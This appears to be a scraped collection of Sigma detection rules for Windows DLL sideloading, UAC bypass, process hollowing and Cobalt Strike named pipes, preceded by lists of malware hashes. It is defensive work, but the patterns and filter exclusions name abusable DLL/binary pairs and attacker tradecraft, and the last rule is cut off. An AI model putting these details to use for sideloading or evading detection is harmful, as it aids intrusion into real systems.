- SHA256=e1cb86386757b947b39086cc8639da988f6e8018ca9995dd669bdc03c8d39d7d
- SHA256=7662187c236003308a7951c2f49c0768636c492f8935292d02f69e59b01d236d
- SHA256=24c900024d213549502301c366d18c318887630f04c96bf0a3d6ba74e0df164f
- SHA256=b7956e31c2fcc0a84bcedf30e5f8115f4e74eed58916253a0c05c8be47283c57
- SHA256=96bf3ee7c6673b69c6aa173bb44e21fa636b1c2c73f4356a7599c121284a51cc
- SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c
- SHA256=0d676baac43d9e2d05b577d5e0c516fba250391ab0cb11232a4b17fd97a51e35
- SHA256=888491196bd8ff528b773a3e453eae49063ad31fb4ca0f9f2e433f8d35445440
- IMPHASH=8d070a93a45ed8ba6dba6bfbe0d084e7
- IMPHASH=7641a0c227f0a3a45b80bb8af43cd152
- IMPHASH=7df0d3ee663fc0e7c72a95e44ba4c82c
- IMPHASH=70e1caa5a322b56fd7951f1b2caacb0d
- IMPHASH=beceab354c66949088c9e5ed1f1ff2a4
- IMPHASH=caa08a0ba5f679b1e5bbae747cb9d626
- IMPHASH=420625b024fba72a24025defdf95b303
- IMPHASH=65ccc2c578a984c31880b6c5e65257d3
- IMPHASH=e717abe060bc5c34925fe3120ac22f45
- IMPHASH=41113a3a832353963112b94f4635a383
- IMPHASH=3866dd9fe63de457bdbf893bf7050ddf
- IMPHASH=3fd33d5b3b52e2db91983ac4b1d7a3c4
- IMPHASH=a998fe47a44bfbf2399968e21cfdf7ca
- IMPHASH=c9a6e83d931286d1604d1add8403e1e5
- IMPHASH=cf0eb2dce2ba2c9ff5dd0da794b8b372
- IMPHASH=ea37e43ffc7cfcba181c5cff37a9be1f
- IMPHASH=8e35c9460537092672b3c7c14bccc7e0
- IMPHASH=7bf14377888c429897eb10a85f70266c
- IMPHASH=b351627263648b1d220bb488e7ec7202
- IMPHASH=ce10082e1aa4c1c2bd953b4a7208e56a
- IMPHASH=a7bd820fa5b895fab06f20739c9f24b8
- IMPHASH=be0dd8b8e045356d600ee55a64d9d197
- IMPHASH=63fd1582ac2edee50f7ec7eedde38ee8
- IMPHASH=6c8d5c79a850eecc2fb0291cebda618d
- IMPHASH=c32d9a9af7f702814e1368c689877f3a
- IMPHASH=6b387c029257f024a43a73f38afb2629
- IMPHASH=df43355c636583e56e92142dcc69cc58
- IMPHASH=e3ee9131742bf9c9d43cb9a425e497dd
- IMPHASH=c214aac08575c139e48d04f5aee21585
- IMPHASH=3c5d2ffd06074f1b09c89465cc8bfbf7
- IMPHASH=059c6bd84285f4960e767f032b33f19b
- IMPHASH=a09170ef09c55cdca9472c02cb1f2647
- IMPHASH=fca0f3c7b6d79f494034b9d2a1f5921a
- IMPHASH=0262d4147f21d681f8519ab2af79283f
- IMPHASH=832219eb71b8bdb771f1d29d27b0acf4
- IMPHASH=514298d18002920ee5a917fc34426417
- IMPHASH=26ceec6572c630bdad60c984e51b7da4
- IMPHASH=dbf09dd3e675f15c7cc9b4d2b8e6cd90
- IMPHASH=4b47f6031c558106eee17655f8f8a32f
- IMPHASH=a6c4a7369500900fc172f9557cff22cf
- IMPHASH=3b49942ec6cef1898e97f741b2b5df8a
- IMPHASH=28dc68bb6d6bf4f6b2db8dd7588b2511
- IMPHASH=27f6dc8a247a22308dd1beba5086b302
- IMPHASH=7d017945bf90936a6c40f73f91ed02c2
- IMPHASH=d51f0f6034eb5e45f0ed4e9b7bbc9c97
- IMPHASH=0ad7da35304c75ccf859bc29fe9ed09e
- IMPHASH=bf9d32a6ab9effcd2fd6a734e5be98f9
- IMPHASH=87fd2b54ed568e2294300e164b8c46f7
- IMPHASH=2de3451f3e7b02970582bb8f9fd8c73a
- IMPHASH=e97dc162f416bf06745bf9ffdf78a0ff
- IMPHASH=2a008187d4a73284ddcc43f1b727b513
- IMPHASH=f8e4844312e81dbdb4e8e95e2ad2c127
- IMPHASH=4c7cc13a110ccdbb932bb9d7d42efdf4
- IMPHASH=45bfe170e0cd654bc1e2ae3fca3ac3f4
- IMPHASH=3db9de43d5d530c10d0cd2d43c7a0771
Unsigned DLL Loaded by Windows Utility
- source: sigma
- technicques:
- t1218
- t1218.010
- t1218.011
Description
Detects windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_sig_status:
SignatureStatus:
- errorChaining
- errorCode_endpoint
- errorExpired
- trusted
filter_main_sig_status_empty:
SignatureStatus:
- ''
- '-'
filter_main_sig_status_null:
SignatureStatus: null
filter_main_signed:
Signed: 'true'
filter_main_signed_empty:
Signed:
- ''
- '-'
filter_main_signed_null:
Signed: null
selection:
Image|endswith:
- \InstallUtil.exe
- \RegAsm.exe
- \RegSvcs.exe
- \regsvr32.exe
- \rundll32.exe
Abusable DLL Potential Sideloading From Suspicious Location
- source: sigma
- technicques:
- t1059
Description
Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
Detection logic
condition: selection_dll and 1 of selection_folders_*
selection_dll:
ImageLoaded|endswith:
- \coreclr.dll
- \facesdk.dll
- \HPCustPartUI.dll
- \libcef.dll
- \ZIPDLL.dll
selection_folders_1:
ImageLoaded|contains:
- :\Perflogs\
- :\Users\Public\
- \Temporary Internet
- \Windows\Temp\
selection_folders_2:
- ImageLoaded|contains|all:
- :\Users\
- \Favorites\
- ImageLoaded|contains|all:
- :\Users\
- \Favourites\
- ImageLoaded|contains|all:
- :\Users\
- \Contacts\
- ImageLoaded|contains|all:
- :\Users\
- \Pictures\
Remote DLL Load Via Rundll32.EXE
- source: sigma
- technicques:
- t1204
- t1204.002
Description
Detects a remote DLL load event via “rundll32.exe”.
Detection logic
condition: selection
selection:
ImageLoaded|startswith: \\\\
Image|endswith: \rundll32.exe
UAC Bypass Using Iscsicpl - ImageLoad
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the “iscsicpl.exe” UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL’s from temp or a any user controlled location in the users %PATH%
Detection logic
condition: selection and not filter
filter:
ImageLoaded|contains|all:
- C:\Windows\
- iscsiexe.dll
selection:
Image: C:\Windows\SysWOW64\iscsicpl.exe
ImageLoaded|endswith: \iscsiexe.dll
Potential WWlib.DLL Sideloading
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading of “wwlib.dll”
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_path:
ImageLoaded|startswith:
- C:\Program Files (x86)\Microsoft Office\
- C:\Program Files\Microsoft Office\
Image|endswith: \winword.exe
Image|startswith:
- C:\Program Files (x86)\Microsoft Office\
- C:\Program Files\Microsoft Office\
selection:
ImageLoaded|endswith: \wwlib.dll
CLR DLL Loaded Via Office Applications
- source: sigma
- technicques:
- t1204
- t1204.002
Description
Detects CLR DLL being loaded by an Office Product
Detection logic
condition: selection
selection:
ImageLoaded|contains: \clr.dll
Image|endswith:
- \excel.exe
- \mspub.exe
- \outlook.exe
- \onenote.exe
- \onenoteim.exe
- \powerpnt.exe
- \winword.exe
VMMap Signed Dbghelp.DLL Potential Sideloading
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.
Detection logic
condition: selection
selection:
ImageLoaded|contains: C:\Debuggers\dbghelp.dll
Image|endswith:
- \vmmap.exe
- \vmmap64.exe
Signed: 'true'
Potential DLL Sideloading Of Non-Existent DLLs From System Folders
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_ms_signed:
Signature: Microsoft Windows
SignatureStatus: Valid
Signed: 'true'
selection:
ImageLoaded|endswith:
- :\Windows\System32\TSMSISrv.dll
- :\Windows\System32\TSVIPSrv.dll
- :\Windows\System32\wbem\wbemcomn.dll
- :\Windows\System32\WLBSCTRL.dll
- :\Windows\System32\wow64log.dll
- :\Windows\System32\WptsExtensions.dll
Active Directory Kerberos DLL Loaded Via Office Application
- source: sigma
- technicques:
- t1204
- t1204.002
Description
Detects Kerberos DLL being loaded by an Office Product
Detection logic
condition: selection
selection:
ImageLoaded|endswith: \kerberos.dll
Image|endswith:
- \excel.exe
- \mspub.exe
- \onenote.exe
- \onenoteim.exe
- \outlook.exe
- \powerpnt.exe
- \winword.exe
Aruba Network Service Potential DLL Sideloading
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access “arubanetsvc.exe” process using DLL Search Order Hijacking
Detection logic
condition: selection and not filter
filter:
ImageLoaded|startswith:
- C:\Windows\System32\
- C:\Windows\SysWOW64\
- C:\Windows\WinSxS\
selection:
ImageLoaded|endswith:
- \wtsapi32.dll
- \msvcr100.dll
- \msvcp100.dll
- \dbghelp.dll
- \dbgcore.dll
- \wininet.dll
- \iphlpapi.dll
- \version.dll
- \cryptsp.dll
- \cryptbase.dll
- \wldp.dll
- \profapi.dll
- \sspicli.dll
- \winsta.dll
- \dpapi.dll
Image|endswith: \arubanetsvc.exe
Suspicious Volume Shadow Copy Vsstrace.dll Load
- source: sigma
- technicques:
- t1490
Description
Detects the image load of VSS DLL by uncommon executables
Detection logic
condition: selection and not 1 of filter_*
filter_program_files:
Image|startswith:
- C:\Program Files\
- C:\Program Files (x86)\
filter_windows:
- Image:
- C:\Windows\explorer.exe
- C:\Windows\ImmersiveControlPanel\SystemSettings.exe
- Image|startswith:
- C:\Windows\System32\
- C:\Windows\SysWOW64\
- C:\Windows\Temp\{
- C:\Windows\WinSxS\
selection:
ImageLoaded|endswith: \vsstrace.dll
Potential DLL Sideloading Using Coregen.exe
- source: sigma
- technicques:
- t1055
- t1218
Description
Detect usage of DLL “coregen.exe” (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
Detection logic
condition: selection and not filter
filter:
ImageLoaded|startswith:
- C:\Windows\System32\
- C:\Windows\SysWOW64\
- C:\Program Files\Microsoft Silverlight\
- C:\Program Files (x86)\Microsoft Silverlight\
selection:
Image|endswith: \coregen.exe
Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker’s machine.
Detection logic
condition: selection
selection:
ImageLoaded|endswith:
- \dbghelp.dll
- \dbgcore.dll
Signed: 'false'
Potential Iviewers.DLL Sideloading
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading of “iviewers.dll” (OLE/COM Object Interface Viewer)
Detection logic
condition: selection and not filter
filter:
ImageLoaded|startswith:
- C:\Program Files (x86)\Windows Kits\
- C:\Program Files\Windows Kits\
selection:
ImageLoaded|endswith: \iviewers.dll
Potential SolidPDFCreator.DLL Sideloading
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading of “SolidPDFCreator.dll”
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_path:
ImageLoaded|startswith:
- C:\Program Files (x86)\SolidDocuments\SolidPDFCreator\
- C:\Program Files\SolidDocuments\SolidPDFCreator\
Image|endswith: \SolidPDFCreator.exe
selection:
ImageLoaded|endswith: \SolidPDFCreator.dll
PCRE.NET Package Image Load
- source: sigma
- technicques:
- t1059
Description
Detects processes loading modules related to PCRE.NET package
Detection logic
condition: selection
selection:
ImageLoaded|contains: \AppData\Local\Temp\ba9ea7344a4a5f591d6e5dc32a13494b\
System Control Panel Item Loaded From Uncommon Location
- source: sigma
- technicques:
- t1036
Description
Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
Detection logic
condition: selection and not 1 of filter_*
filter_main_legit_location:
ImageLoaded|contains:
- :\Windows\System32\
- :\Windows\SysWOW64\
- :\Windows\WinSxS\
selection:
ImageLoaded|endswith:
- \hdwwiz.cpl
- \appwiz.cpl
Suspicious WSMAN Provider Image Loads
- source: sigma
- technicques:
- t1021
- t1021.003
- t1059
- t1059.001
Description
Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
Detection logic
commandline_null:
CommandLine: null
condition: ( request_client or respond_server ) and not 1 of filter* and not ( svchost
and commandline_null )
filter_citrix:
Image|startswith: C:\Program Files\Citrix\
filter_general:
Image|endswith:
- \powershell.exe
- C:\Windows\System32\sdiagnhost.exe
- C:\Windows\System32\services.exe
filter_mscorsvw:
Image|endswith: \mscorsvw.exe
Image|startswith:
- C:\Windows\Microsoft.NET\Framework64\v
- C:\Windows\Microsoft.NET\Framework\v
filter_nextron:
Image|startswith: C:\Windows\Temp\asgard2-agent\
filter_ps_ise:
Image|endswith: \powershell_ise.exe
filter_svchost:
CommandLine|contains:
- svchost.exe -k netsvcs -p -s BITS
- svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc
- svchost.exe -k NetworkService -p -s Wecsvc
- svchost.exe -k netsvcs
filter_svr_2019:
Image:
- C:\Windows\System32\Configure-SMRemoting.exe
- C:\Windows\System32\ServerManager.exe
filter_upgrade:
Image|startswith: C:\$WINDOWS.~BT\Sources\
request_client:
- ImageLoaded|endswith:
- \WsmSvc.dll
- \WsmAuto.dll
- \Microsoft.WSMan.Management.ni.dll
- OriginalFileName:
- WsmSvc.dll
- WSMANAUTOMATION.DLL
- Microsoft.WSMan.Management.dll
respond_server:
Image|endswith: \svchost.exe
OriginalFileName: WsmWmiPl.dll
svchost:
Image|endswith: \svchost.exe
Active Directory Parsing DLL Loaded Via Office Application
- source: sigma
- technicques:
- t1204
- t1204.002
Description
Detects DSParse DLL being loaded by an Office Product
Detection logic
condition: selection
selection:
ImageLoaded|contains: \dsparse.dll
Image|endswith:
- \excel.exe
- \mspub.exe
- \onenote.exe
- \onenoteim.exe
- \outlook.exe
- \powerpnt.exe
- \winword.exe
DLL Load By System Process From Suspicious Locations
- source: sigma
- technicques:
- t1070
Description
Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as “C:\Users\Public”
Detection logic
condition: selection
selection:
ImageLoaded|startswith:
- C:\Users\Public\
- C:\PerfLogs\
Image|startswith: C:\Windows\
Suspicious Volume Shadow Copy VSS_PS.dll Load
- source: sigma
- technicques:
- t1490
Description
Detects the image load of vss_ps.dll by uncommon executables
Detection logic
condition: selection and not 1 of filter_*
filter_image_null:
Image: null
filter_legit:
Image|endswith:
- \clussvc.exe
- \dismhost.exe
- \dllhost.exe
- \inetsrv\appcmd.exe
- \inetsrv\iissetup.exe
- \msiexec.exe
- \rundll32.exe
- \searchindexer.exe
- \srtasks.exe
- \svchost.exe
- \System32\SystemPropertiesAdvanced.exe
- \taskhostw.exe
- \thor.exe
- \thor64.exe
- \tiworker.exe
- \vssvc.exe
- \WmiPrvSE.exe
- \wsmprovhost.exe
Image|startswith: C:\Windows\
filter_programfiles:
Image|startswith:
- C:\Program Files\
- C:\Program Files (x86)\
filter_update:
CommandLine|contains: \dismhost.exe {
CommandLine|startswith: C:\$WinREAgent\Scratch\
selection:
ImageLoaded|endswith: \vss_ps.dll
Third Party Software DLL Sideloading
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects DLL sideloading of DLLs that are part of third party software (zoom, discord….etc)
Detection logic
condition: (selection_lenovo and not filter_lenovo) or (selection_toshiba and not
filter_toshiba)
filter_lenovo:
- ImageLoaded|contains: \AppData\local\Google\Chrome\Application\
- ImageLoaded|startswith:
- C:\Program Files\Lenovo\Communications Utility\
- C:\Program Files (x86)\Lenovo\Communications Utility\
filter_toshiba:
ImageLoaded|startswith:
- C:\Program Files\Toshiba\Bluetooth Toshiba Stack\
- C:\Program Files (x86)\Toshiba\Bluetooth Toshiba Stack\
selection_lenovo:
ImageLoaded|endswith: \commfunc.dll
selection_toshiba:
ImageLoaded|endswith: \tosbtkbd.dll
VMMap Unsigned Dbghelp.DLL Potential Sideloading
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_signed:
Signed: 'true'
selection:
ImageLoaded|contains: C:\Debuggers\dbghelp.dll
Image|endswith:
- \vmmap.exe
- \vmmap64.exe
Amsi.DLL Loaded Via LOLBIN Process
- source: sigma
- technicques:
Description
Detects loading of “Amsi.dll” by a living of the land process. This could be an indication of a “PowerShell without PowerShell” attack
Detection logic
condition: selection
selection:
ImageLoaded|endswith: \amsi.dll
Image|endswith:
- \ExtExport.exe
- \odbcconf.exe
- \regsvr32.exe
- \rundll32.exe
Potential Vivaldi_elf.DLL Sideloading
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading of “vivaldi_elf.dll”
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_legit_path:
ImageLoaded|contains: \Vivaldi\Application\
Image|endswith: \Vivaldi\Application\vivaldi.exe
selection:
ImageLoaded|endswith: \vivaldi_elf.dll
Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL side loading of “KeyScramblerIE.dll” by “KeyScrambler.exe”. Various threat actors and malware have been found side loading a masqueraded “KeyScramblerIE.dll” through “KeyScrambler.exe”.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_legitimate_path:
ImageLoaded|contains:
- C:\Program Files (x86)\KeyScrambler\
- C:\Program Files\KeyScrambler\
Image|contains:
- C:\Program Files (x86)\KeyScrambler\
- C:\Program Files\KeyScrambler\
filter_main_signature:
Signature: QFX Software Corporation
SignatureStatus: Valid
selection:
ImageLoaded|endswith: \KeyScramblerIE.dll
Image|endswith:
- \KeyScrambler.exe
- \KeyScramblerLogon.exe
Potential DLL Sideloading Via JsSchHlp
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
Detection logic
condition: selection and not filter
filter:
ImageLoaded|startswith: C:\Program Files\Common Files\Justsystem\JsSchHlp\
selection:
ImageLoaded|endswith: \JSESPR.dll
Potential AVKkid.DLL Sideloading
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading of “AVKkid.dll”
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_legit_path:
ImageLoaded|startswith:
- C:\Program Files (x86)\G DATA\
- C:\Program Files\G DATA\
Image|contains:
- C:\Program Files (x86)\G DATA\
- C:\Program Files\G DATA\
Image|endswith: \AVKKid.exe
selection:
ImageLoaded|endswith: \AVKkid.dll
Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE
- source: sigma
- technicques:
- t1202
Description
Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the “sdiageng.dll” library
Detection logic
condition: selection
selection:
ImageLoaded|endswith: \sdiageng.dll
Image|endswith: \msdt.exe
Suspicious Volume Shadow Copy Vssapi.dll Load
- source: sigma
- technicques:
- t1490
Description
Detects the image load of VSS DLL by uncommon executables
Detection logic
condition: selection and not 1 of filter_*
filter_program_files:
Image|startswith:
- C:\Program Files\
- C:\Program Files (x86)\
filter_programdata_packagecache:
Image|startswith: C:\ProgramData\Package Cache\
filter_windows:
- Image:
- C:\Windows\explorer.exe
- C:\Windows\ImmersiveControlPanel\SystemSettings.exe
- Image|startswith:
- C:\Windows\System32\
- C:\Windows\SysWOW64\
- C:\Windows\Temp\{
- C:\Windows\WinSxS\
selection:
ImageLoaded|endswith: \vssapi.dll
Potential RjvPlatform.DLL Sideloading From Default Location
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects loading of “RjvPlatform.dll” by the “SystemResetPlatform.exe” binary which can be abused as a method of DLL side loading since the “$SysReset” directory isn’t created by default.
Detection logic
condition: selection
selection:
Image: C:\Windows\System32\SystemResetPlatform\SystemResetPlatform.exe
ImageLoaded: C:\$SysReset\Framework\Stack\RjvPlatform.dll
PowerShell Core DLL Loaded Via Office Application
- source: sigma
- technicques:
Description
Detects PowerShell core DLL being loaded by an Office Product
Detection logic
condition: selection
selection:
ImageLoaded|contains:
- \System.Management.Automation.Dll
- \System.Management.Automation.ni.Dll
Image|endswith:
- \excel.exe
- \mspub.exe
- \outlook.exe
- \onenote.exe
- \onenoteim.exe
- \powerpnt.exe
- \winword.exe
Potential DLL Sideloading Via ClassicExplorer32.dll
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
Detection logic
condition: selection_classicexplorer and not filter_classicexplorer
filter_classicexplorer:
ImageLoaded|startswith: C:\Program Files\Classic Shell\
selection_classicexplorer:
ImageLoaded|endswith: \ClassicExplorer32.dll
Wmiprvse Wbemcomn DLL Hijack
- source: sigma
- technicques:
- t1021
- t1021.002
- t1047
Description
Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.
Detection logic
condition: selection
selection:
ImageLoaded|endswith: \wbem\wbemcomn.dll
Image|endswith: \wmiprvse.exe
Potential Chrome Frame Helper DLL Sideloading
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading of “chrome_frame_helper.dll”
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_path:
ImageLoaded|startswith:
- C:\Program Files\Google\Chrome\Application\
- C:\Program Files (x86)\Google\Chrome\Application\
filter_optional_user_path:
ImageLoaded|contains: \AppData\local\Google\Chrome\Application\
selection:
ImageLoaded|endswith: \chrome_frame_helper.dll
DLL Sideloading Of ShellChromeAPI.DLL
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects processes loading the non-existent DLL “ShellChromeAPI”. One known example is the “DeviceEnroller” binary in combination with the “PhoneDeepLink” flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
Detection logic
condition: selection
selection:
ImageLoaded|endswith: \ShellChromeAPI.dll
DotNet CLR DLL Loaded By Scripting Applications
- source: sigma
- technicques:
- t1055
Description
Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
Detection logic
condition: selection
selection:
ImageLoaded|endswith:
- \clr.dll
- \mscoree.dll
- \mscorlib.dll
Image|endswith:
- \cmstp.exe
- \cscript.exe
- \mshta.exe
- \msxsl.exe
- \regsvr32.exe
- \wmic.exe
- \wscript.exe
DotNET Assembly DLL Loaded Via Office Application
- source: sigma
- technicques:
- t1204
- t1204.002
Description
Detects any assembly DLL being loaded by an Office Product
Detection logic
condition: selection
selection:
ImageLoaded|startswith: C:\Windows\assembly\
Image|endswith:
- \excel.exe
- \mspub.exe
- \onenote.exe
- \onenoteim.exe
- \outlook.exe
- \powerpnt.exe
- \winword.exe
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading of “libcurl.dll” by the “gup.exe” process from an uncommon location
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_notepad_plusplus:
Image|endswith: \Notepad++\updater\GUP.exe
selection:
ImageLoaded|endswith: \libcurl.dll
Image|endswith: \gup.exe
Potential Rcdll.DLL Sideloading
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects potential DLL sideloading of rcdll.dll
Detection logic
condition: selection and not filter
filter:
ImageLoaded|startswith:
- C:\Program Files (x86)\Microsoft Visual Studio\
- C:\Program Files (x86)\Windows Kits\
selection:
ImageLoaded|endswith: \rcdll.dll
Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
- source: sigma
- technicques:
- t1021
- t1021.002
- t1021.003
Description
Detects potential DLL hijack of “iertutil.dll” found in the DCOM InternetExplorer.Application Class
Detection logic
condition: selection
selection:
ImageLoaded|endswith: \Internet Explorer\iertutil.dll
Image|endswith: \Internet Explorer\iexplore.exe
Potential Process Hollowing Activity
- source: sigma
- technicques:
- t1055
- t1055.012
Description
Detects when a memory process image does not match the disk image, indicative of process hollowing.
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_generic:
Image|contains:
- :\Program Files (x86)
- :\Program Files\
- :\Windows\System32\wbem\WMIADAP.exe
- :\Windows\SysWOW64\wbem\WMIADAP.exe
filter_optional_edge:
Image|endswith: \WindowsApps\MicrosoftEdge.exe
filter_optional_opera:
Image|contains: \AppData\Local\Programs\Opera\
Image|endswith: \opera.exe
selection:
Type: Image is replaced
PUA - PAExec Default Named Pipe
- source: sigma
- technicques:
- t1569
- t1569.002
Description
Detects PAExec default named pipe
Detection logic
condition: selection
selection:
PipeName|startswith: \PAExec
HackTool - CoercedPotato Named Pipe Creation
- source: sigma
- technicques:
- t1055
Description
Detects the pattern of a pipe name as used by the hack tool CoercedPotato
Detection logic
condition: selection
selection:
PipeName|contains: \coerced\
WMI Event Consumer Created Named Pipe
- source: sigma
- technicques:
- t1047
Description
Detects the WMI Event Consumer service scrcons.exe creating a named pipe
Detection logic
condition: selection
selection:
Image|endswith: \scrcons.exe
CobaltStrike Named Pipe
- source: sigma
- technicques:
- t1055
Description
Detects the creation of a named pipe as used by CobaltStrike
Detection logic
condition: 1 of selection*
selection_MSSE:
PipeName|contains|all:
- \MSSE-
- -server
selection_interprocess:
PipeName|startswith: \interprocess_
selection_lsarpc:
PipeName|startswith: \lsarpc_
selection_mojo:
PipeName|startswith: \mojo_
selection_msagent:
PipeName|startswith: \msagent_
selection_netlogon:
PipeName|startswith: \netlogon_
selection_postex:
PipeName|startswith: \postex_
selection_samr:
PipeName|startswith: \samr_
selection_srvsvc:
PipeName|startswith: \srvsvc_
selection_status:
PipeName|startswith: \status_
selection_wkssvc:
PipeName|startswith: \wkssvc_
Malicious Named Pipe Created
- source: sigma
- technicques:
- t1055
Description
Detects the creation of a named pipe seen used by known APTs or malware.
Detection logic
condition: selection
selection:
PipeName:
- \46a676ab7f179e511e30dd2dc41bd388
- \583da945-62af-10e8-4902-a8f205c72b2e
- \6e7645c4-32c5-4fe3-aabf-e94c2f4370e7
- \9f81f59bc58452127884ce513865ed20
- \adschemerpc
- \ahexec
- \AnonymousPipe
- \bc31a7
- \bc367
- \bizkaz
- \csexecsvc
- \dce_3d
- \e710f28d59aa529d6792ca6ff0ca1b34
- \gruntsvc
- \isapi_dg
- \isapi_dg2
- \isapi_http
- \jaccdpqnvbrrxlaf
- \lsassw
- \NamePipe_MoreWindows
- \pcheap_reuse
- \Posh*
- \rpchlp_3
- \sdlrpc
- \svcctl
- \testPipe
- \winsession
CobaltStrike Named Pipe Pattern Regex
- source: sigma
- technicques:
- t1055
Description
Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles
Detection logic
condition: selection
selection:
- PipeName|re: \\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}
- PipeName|re: \\wkssvc_?[0-9a-f]{2}
- PipeName|re: \\ntsvcs[0-9a-f]{2}
- PipeName|re: \\DserNamePipe[0-9a-f]{2}
- PipeName|re: \\SearchTextHarvester[0-9a-f]{2}
- PipeName|re: \\mypipe-(?:f|h)[0-9a-f]{2}
- PipeName|re: \\windows\.update\.manager[0-9a-f]{2,3}
- PipeName|re: \\ntsvcs_[0-9a-f]{2}
- PipeName|re: \\scerpc_?[0-9a-f]{2}
- PipeName|re: \\PGMessagePipe[0-9a-f]{2}
- PipeName|re: \\MsFteWds[0-9a-f]{2}
- PipeName|re: \\f4c3[0-9a-f]{2}
- PipeName|re: \\fullduplex_[0-9a-f]{2}
- PipeName|re: \\msrpc_[0-9a-f]{4}
- PipeName|re: \\win\\msrpc_[0-9a-f]{2}
- PipeName|re: \\f53f[0-9a-f]{2}
- PipeName|re: \\rpc_[0-9a-f]{2}
- PipeName|re: \\spoolss_[0-9a-f]{2}
- PipeName|re: \\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0,
ADFS Database Named Pipe Connection By Uncommon Tool
- source: sigma
- technicques:
- t1005
Description
Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_generic:
Image|endswith:
- :\Windows\System32\mmc.exe
- :\Windows\system32\svchost.exe
- :\Windows\System32\wsmprovhost.exe
- :\Windows\SysWOW64\mmc.exe
- :\Windows\SysWOW64\wsmprovhost.exe
- :\Windows\WID\Binn\sqlwriter.exe
- \AzureADConnect.exe
- \Microsoft.Identity.Health.Adfs.PshSurrogate.exe
- \Microsoft.IdentityServer.ServiceHost.exe
- \Microsoft.Tri.Sensor.exe
- \sqlservr.exe
- \tssdis.exe
selection:
PipeName: \MICROSOFT##WID\tsql\query
Suspicious Encoded Scripts in a WMI Consumer
- source: sigma
- technicques:
- t1047
- t1546
- t1546.003
Description
Detects suspicious encoded payloads in WMI Event Consumers
Detection logic
condition: selection_destination
selection_destination:
Destination|base64offset|contains:
- WriteProcessMemory
- This program cannot be run in DOS mode
- This program must be run under Win32
Use Get-NetTCPConnection - PowerShell Module
- source: sigma
- technicques:
- t1049
Description
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Detection logic
